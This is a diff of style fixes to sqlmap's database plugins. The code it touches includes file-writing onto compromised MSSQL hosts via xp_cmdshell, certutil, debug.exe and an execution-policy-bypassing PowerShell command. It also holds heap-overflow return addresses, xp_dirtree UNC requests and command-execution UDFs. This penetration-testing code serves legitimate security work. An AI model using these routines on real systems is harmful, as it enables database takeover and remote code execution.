raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
@ -184,9 +184,7 @@ class Enumeration(GenericEnumeration):
rootQuery = queries[DBMS.MAXDB].columns rootQuery = queries[DBMS.MAXDB].columns
for tbl in tblList: for tbl in tblList:
if conf.db is not None and len(kb.data.cachedColumns) > 0 \ if conf.db is not None and len(kb.data.cachedColumns) > 0 and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]:
and conf.db in kb.data.cachedColumns and tbl in \
kb.data.cachedColumns[conf.db]:
infoMsg = "fetched tables' columns on " infoMsg = "fetched tables' columns on "
infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg) logger.info(infoMsg)

6
plugins/dbms/mssqlserver/enumeration.py
View File

@ -368,16 +368,16 @@ class Enumeration(GenericEnumeration):
if foundTbl not in dbs[db]: if foundTbl not in dbs[db]:
dbs[db][foundTbl] = {} dbs[db][foundTbl] = {}
if colConsider == "1": if colConsider == '1':
conf.db = db conf.db = db
conf.tbl = foundTbl conf.tbl = foundTbl
conf.col = column conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)
if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db]\ if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl]) dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
kb.data.cachedColumns = {} kb.data.cachedColumns = {}
else: else:
dbs[db][foundTbl][column] = None dbs[db][foundTbl][column] = None

70
plugins/dbms/mssqlserver/filesystem.py
View File

@ -73,10 +73,13 @@ class Filesystem(GenericFilesystem):
logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr))
commands = ("cd \"%s\"" % tmpPath, "debug < %s" % randScr, "del /F /Q %s" % randScr) commands = (
complComm = " & ".join(command for command in commands) "cd \"%s\"" % tmpPath,
"debug < %s" % randScr,
"del /F /Q %s" % randScr
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
return chunkName return chunkName
@ -195,12 +198,13 @@ class Filesystem(GenericFilesystem):
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile) logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, commands = (
"del /F /Q \"%s\"" % encodedBase64FilePath, "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % randPSScriptPath) "del /F /Q \"%s\"" % encodedBase64FilePath,
complComm = " & ".join(command for command in commands) "del /F /Q \"%s\"" % randPSScriptPath
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType infoMsg = "using debug.exe to write the %s " % fileType
@ -219,10 +223,13 @@ class Filesystem(GenericFilesystem):
debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile)) commands = (
complComm = " & ".join(command for command in commands) "cd \"%s\"" % tmpPath,
"ren %s %s" % (chunkName, dFileName),
"move /Y %s %s" % (dFileName, dFile)
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
else: else:
debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload " debugMsg += "sqlmap will split it into chunks locally, upload "
@ -244,17 +251,22 @@ class Filesystem(GenericFilesystem):
debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F /Q %s" % chunkName) commands = (
complComm = " & ".join(command for command in commands) "cd \"%s\"" % tmpPath,
copyCmd,
"del /F /Q %s" % chunkName
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile)) logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile)) commands = (
complComm = " & ".join(command for command in commands) "cd \"%s\"" % tmpPath,
"move /Y %s %s" % (dFileName, dFile)
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
infoMsg = "using a custom visual basic script to write the " infoMsg = "using a custom visual basic script to write the "
@ -330,12 +342,14 @@ class Filesystem(GenericFilesystem):
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd \"%s\"" % tmpPath, "cscript //nologo %s" % randVbs, commands = (
"del /F /Q %s" % randVbs, "cd \"%s\"" % tmpPath,
"del /F /Q %s" % randFile) "cscript //nologo %s" % randVbs,
complComm = " & ".join(command for command in commands) "del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType): def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType infoMsg = "using certutil.exe to write the %s " % fileType
@ -349,7 +363,7 @@ class Filesystem(GenericFilesystem):
encodedFileContent = base64encode(wFileContent) encodedFileContent = base64encode(wFileContent)
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
@ -357,11 +371,13 @@ class Filesystem(GenericFilesystem):
logger.debug("decoding the file to %s.." % dFile) logger.debug("decoding the file to %s.." % dFile)
commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile), commands = (
"del /F /Q %s" % randFile) "cd \"%s\"" % tmpPath,
complComm = " & ".join(command for command in commands) "certutil -f -decode %s %s" % (randFile, dFile),
"del /F /Q %s" % randFile
)
self.execCmd(complComm) self.execCmd(" & ".join(command for command in commands))
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended # NOTE: this is needed here because we use xp_cmdshell extended

32
plugins/dbms/mssqlserver/fingerprint.py
View File

@ -88,12 +88,14 @@ class Fingerprint(GenericFingerprint):
infoMsg = "confirming %s" % DBMS.MSSQL infoMsg = "confirming %s" % DBMS.MSSQL
logger.info(infoMsg) logger.info(infoMsg)
for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \ for version, check in (
("2005", "XACT_STATE()=XACT_STATE()"), \ ("2000", "HOST_NAME()=HOST_NAME()"),
("2008", "SYSDATETIME()=SYSDATETIME()"), \ ("2005", "XACT_STATE()=XACT_STATE()"),
("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \ ("2008", "SYSDATETIME()=SYSDATETIME()"),
("2014", "CHARINDEX('12.0.2000',@@version)>0"), \ ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"),
("2016", "ISJSON(NULL) IS NULL")): ("2014", "CHARINDEX('12.0.2000',@@version)>0"),
("2016", "ISJSON(NULL) IS NULL")
):
result = inject.checkBooleanExpression(check) result = inject.checkBooleanExpression(check)
if result: if result:
@ -136,14 +138,16 @@ class Fingerprint(GenericFingerprint):
# Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
# http://en.wikipedia.org/wiki/Windows_NT#Releases # http://en.wikipedia.org/wiki/Windows_NT#Releases
versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)), versions = {
"2000": ("5.0", (4, 3, 2, 1)), "NT": ("4.0", (6, 5, 4, 3, 2, 1)),
"XP": ("5.1", (3, 2, 1)), "2000": ("5.0", (4, 3, 2, 1)),
"2003": ("5.2", (2, 1)), "XP": ("5.1", (3, 2, 1)),
"Vista or 2008": ("6.0", (2, 1)), "2003": ("5.2", (2, 1)),
"7 or 2008 R2": ("6.1", (1, 0)), "Vista or 2008": ("6.0", (2, 1)),
"8 or 2012": ("6.2", (0,)), "7 or 2008 R2": ("6.1", (1, 0)),
"8.1 or 2012 R2": ("6.3", (0,)) } "8 or 2012": ("6.2", (0,)),
"8.1 or 2012 R2": ("6.3", (0,))
}
# Get back-end DBMS underlying operating system version # Get back-end DBMS underlying operating system version
for version, data in versions.items(): for version, data in versions.items():

25
plugins/dbms/mssqlserver/takeover.py
View File

@ -20,7 +20,7 @@ class Takeover(GenericTakeover):
GenericTakeover.__init__(self) GenericTakeover.__init__(self)
def uncPathRequest(self): def uncPathRequest(self):
#inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) # inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True)
inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath) inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath)
def spHeapOverflow(self): def spHeapOverflow(self):
@ -31,21 +31,22 @@ class Takeover(GenericTakeover):
""" """
returns = { returns = {
# 2003 Service Pack 0 # 2003 Service Pack 0
"2003-0": (""), "2003-0": (""),
# 2003 Service Pack 1 # 2003 Service Pack 1
"2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ), "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 12/2008 # 2003 Service Pack 2 updated at 12/2008
#"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ), # "2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 05/2009 # 2003 Service Pack 2 updated at 05/2009
"2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"),
# 2003 Service Pack 2 updated at 09/2009
# "2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
}
# 2003 Service Pack 2 updated at 09/2009
#"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"),
}
addrs = None addrs = None
for versionSp, data in returns.items(): for versionSp, data in returns.items():

10
plugins/dbms/mysql/__init__.py
View File

@ -23,11 +23,11 @@ class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take
def __init__(self): def __init__(self):
self.excludeDbsList = MYSQL_SYSTEM_DBS self.excludeDbsList = MYSQL_SYSTEM_DBS
self.sysUdfs = { self.sysUdfs = {
# UDF name: UDF return data-type # UDF name: UDF return data-type
"sys_exec": { "return": "int" }, "sys_exec": {"return": "int"},
"sys_eval": { "return": "string" }, "sys_eval": {"return": "string"},
"sys_bineval": { "return": "int" } "sys_bineval": {"return": "int"}
} }
Syntax.__init__(self) Syntax.__init__(self)
Fingerprint.__init__(self) Fingerprint.__init__(self)

25
plugins/dbms/mysql/fingerprint.py
View File

@ -41,18 +41,19 @@ class Fingerprint(GenericFingerprint):
# Reference: https://downloads.mysql.com/archives/community/ # Reference: https://downloads.mysql.com/archives/community/
versions = ( versions = (
(32200, 32235), # MySQL 3.22 (32200, 32235), # MySQL 3.22
(32300, 32359), # MySQL 3.23 (32300, 32359), # MySQL 3.23
(40000, 40032), # MySQL 4.0 (40000, 40032), # MySQL 4.0
(40100, 40131), # MySQL 4.1 (40100, 40131), # MySQL 4.1
(50000, 50096), # MySQL 5.0 (50000, 50096), # MySQL 5.0
(50100, 50172), # MySQL 5.1 (50100, 50172), # MySQL 5.1
(50400, 50404), # MySQL 5.4 (50400, 50404), # MySQL 5.4
(50500, 50554), # MySQL 5.5 (50500, 50558), # MySQL 5.5
(50600, 50635), # MySQL 5.6 (50600, 50638), # MySQL 5.6
(50700, 50717), # MySQL 5.7 (50700, 50720), # MySQL 5.7
(60000, 60014), # MySQL 6.0 (60000, 60014), # MySQL 6.0
) (80000, 80003), # MySQL 8.0
)
index = -1 index = -1
for i in xrange(len(versions)): for i in xrange(len(versions)):

4
plugins/dbms/mysql/takeover.py
View File

@ -67,10 +67,10 @@ class Takeover(GenericTakeover):
# On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
# On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
else: else:
#logger.debug("retrieving MySQL data directory absolute path") # logger.debug("retrieving MySQL data directory absolute path")
# Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir
#self.__datadir = inject.getValue("SELECT @@datadir") # self.__datadir = inject.getValue("SELECT @@datadir")
# NOTE: specifying the relative path as './udf.dll' # NOTE: specifying the relative path as './udf.dll'
# saves in @@datadir on both MySQL 4.1 and MySQL 5.0 # saves in @@datadir on both MySQL 4.1 and MySQL 5.0

12
plugins/dbms/postgresql/__init__.py
View File

@ -23,12 +23,12 @@ class PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous,
def __init__(self): def __init__(self):
self.excludeDbsList = PGSQL_SYSTEM_DBS self.excludeDbsList = PGSQL_SYSTEM_DBS
self.sysUdfs = { self.sysUdfs = {
# UDF name: UDF parameters' input data-type and return data-type # UDF name: UDF parameters' input data-type and return data-type
"sys_exec": { "input": ["text"], "return": "int4" }, "sys_exec": {"input": ["text"], "return": "int4"},
"sys_eval": { "input": ["text"], "return": "text" }, "sys_eval": {"input": ["text"], "return": "text"},
"sys_bineval": { "input": ["text"], "return": "int4" }, "sys_bineval": {"input": ["text"], "return": "int4"},
"sys_fileread": { "input": ["text"], "return": "text" } "sys_fileread": {"input": ["text"], "return": "text"}
} }
Syntax.__init__(self) Syntax.__init__(self)
Fingerprint.__init__(self) Fingerprint.__init__(self)

2
plugins/dbms/postgresql/syntax.py
View File

@ -22,6 +22,6 @@ class Syntax(GenericSyntax):
""" """
def escaper(value): def escaper(value):
return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s)
return Syntax._escape(expression, quote, escaper) return Syntax._escape(expression, quote, escaper)

2
plugins/dbms/sybase/enumeration.py
View File

@ -176,7 +176,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb() conf.db = self.getCurrentDb()
elif conf.db is not None: elif conf.db is not None:
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)

13
plugins/generic/databases.py
View File

@ -400,7 +400,7 @@ class Databases:
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB):
conf.db = conf.db.upper() conf.db = conf.db.upper()
if ',' in conf.db: if ',' in conf.db:
errMsg = "only one database name is allowed when enumerating " errMsg = "only one database name is allowed when enumerating "
errMsg += "the tables' columns" errMsg += "the tables' columns"
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
@ -663,8 +663,7 @@ class Databases:
query += condQuery query += condQuery
elif Backend.isDbms(DBMS.MSSQL): elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.blind.count % (conf.db, conf.db, \ query = rootQuery.blind.count % (conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
query += condQuery.replace("[DB]", conf.db) query += condQuery.replace("[DB]", conf.db)
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
@ -763,8 +762,7 @@ class Databases:
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper())) query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
elif Backend.isDbms(DBMS.MSSQL): elif Backend.isDbms(DBMS.MSSQL):
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column) query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column)
elif Backend.isDbms(DBMS.INFORMIX): elif Backend.isDbms(DBMS.INFORMIX):
@ -823,10 +821,7 @@ class Databases:
self.getTables() self.getTables()
infoMsg = "fetched tables: " infoMsg = "fetched tables: "
infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \ infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) for _ in tbl) for db, tbl in kb.data.cachedTables.items()])
Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
kb.data.cachedTables.items()])
logger.info(infoMsg) logger.info(infoMsg)
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():

2
plugins/generic/entries.py
View File

@ -470,7 +470,7 @@ class Entries:
if kb.data.cachedTables: if kb.data.cachedTables:
if isinstance(kb.data.cachedTables, list): if isinstance(kb.data.cachedTables, list):
kb.data.cachedTables = { None: kb.data.cachedTables } kb.data.cachedTables = {None: kb.data.cachedTables}
for db, tables in kb.data.cachedTables.items(): for db, tables in kb.data.cachedTables.items():
conf.db = db conf.db = db

2
plugins/generic/filesystem.py
View File

@ -49,7 +49,7 @@ class Filesystem:
elif Backend.isDbms(DBMS.MSSQL): elif Backend.isDbms(DBMS.MSSQL):
self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)")
inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)); inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField))
lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName)

1
tamper/between.py
View File

@ -55,5 +55,4 @@ def tamper(payload, **kwargs):
_ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5))
retVal = retVal.replace(match.group(0), _) retVal = retVal.replace(match.group(0), _)
return retVal return retVal

2
tamper/ifnull2casewhenisnull.py
View File

@ -61,5 +61,3 @@ def tamper(payload, **kwargs):
break break
return payload return payload

130
txt/checksum.md5
View File

@ -21,35 +21,35 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py
1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py
b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py
0f581182871148b0456a691ae85b04c0 lib/controller/action.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py
e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py 62a348c0ed32c7e67cd456680791cad5 lib/controller/checks.py
9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py a66044daa98684fde830324c54da98ee lib/controller/controller.py
a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py
1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py
052c368ae6ca09362a19376c8483fa85 lib/core/agent.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py
591c66fa439a48b7d8b5b581437cd14d lib/core/bigarray.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py
33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py 33c03aad7f4c6e7241b6f204560e69ca lib/core/common.py
2910524e4478be6b5893fb9d851a62ec lib/core/convert.py 1c4c4bf8eacc911378a2e4b2f9f03184 lib/core/convert.py
9f87391b6a3395f7f50830b391264f27 lib/core/data.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py
72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py
12e80071013606f01822c3823fb51054 lib/core/decorators.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py
9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py
a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py
9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py
c8551f7696a76450e6d139409e4f06cd lib/core/enums.py bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py
cada93357a7321655927fc9625b3bfec lib/core/exception.py cada93357a7321655927fc9625b3bfec lib/core/exception.py
1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py
458a194764805cd8312c14ecd4be4d1e lib/core/log.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py
63ac6631d75e4f7c20b946a0c06bad33 lib/core/optiondict.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py
8a9346b975931d8d995354692ab68f82 lib/core/option.py 911ec851f2cad046036ddaf776c8559f lib/core/option.py
